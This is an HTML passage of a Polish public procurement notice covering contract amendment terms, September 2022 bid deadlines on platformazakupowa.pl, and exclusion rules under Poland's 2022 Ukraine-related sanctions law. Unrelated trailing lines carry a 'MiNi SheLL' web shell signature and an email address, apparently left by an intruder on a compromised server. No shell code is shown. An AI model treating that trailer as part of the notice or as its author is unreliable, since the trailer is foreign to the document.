przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 455 Pzp oraz wskazanym we Wzorze Umowy, stanowiącym Załącznik Nr 6 do SWZ.<br/>Zamawiający dopuszcza możliwość zmiany Umowy w przypadkach określonych w art. 455 ust. 1 pkt 2 – 4 i ust. 2 ustawy Pzp oraz przewiduje zgodnie z art. 455 ust. 1 pkt 1) ustawy Pzp możliwość zmiany postanowień Umowy określając następujący rodzaj i zakres oraz warunki zmiany postanowień Umowy: <br/>1) Wynagrodzenia w przypadku:<br/>a) zmiany stawki podatku od towarów i usług (VAT), wynagrodzenie należne Wykonawcy zostanie odpowiednio zmienione w stosunku wynikającym ze zmienionej stawki podatku od towarów i usług (VAT),<br/>2) Terminu realizacji Przedmiotu Umowy:<br/>a) w przypadku niemożności wykonywania przedmiotu umowy w razie zaistnienia okoliczności nadzwyczajnych, np. działań wojennych, aktów terroryzmu, rewolucji, przewrotu wojskowego lub cywilnego, wojny domowej, ogłoszenie stanu wyjątkowego, skażeń radioaktywnych, termin wykonania przedmiotu umowy przedłużony zostanie o czas trwania okoliczności nadzwyczajnych uniemożliwiających wykonanie przedmiotu Umowy i - jeśli dotyczy – o czas niezbędny do usunięcia przeszkody uniemożliwiającej wykonanie przedmiotu Umowy, powstałej w związku z okolicznościami nadzwyczajnymi, o których mowa powyżej.<br/>Wszystkie zmiany umowy wymagają formy pisemnej (aneks do umowy) pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-09-14 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/transakcja/658950</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-09-14 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-10-13</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>a) akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej pod linkiem https://platformazakupowa.pl/strona/1-regulamin w zakładce „Regulamin&#34; oraz uznaje go za wiążący, <br/>b) zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej na stronie internetowej. <br/>Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją korzystania z platformazakupowa.pl.<br/>Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl dotyczące w szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu platformazakupowa.pl znajdują się w zakładce<br/>„Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje.<br/>Wykluczeniu z udziału w postępowaniu podlega Wykonawca, w odniesieniu do którego zachodzą okoliczności<br/>określone w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania<br/>wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego.

Creat By MiNi SheLL
Email: jattceo@gmail.com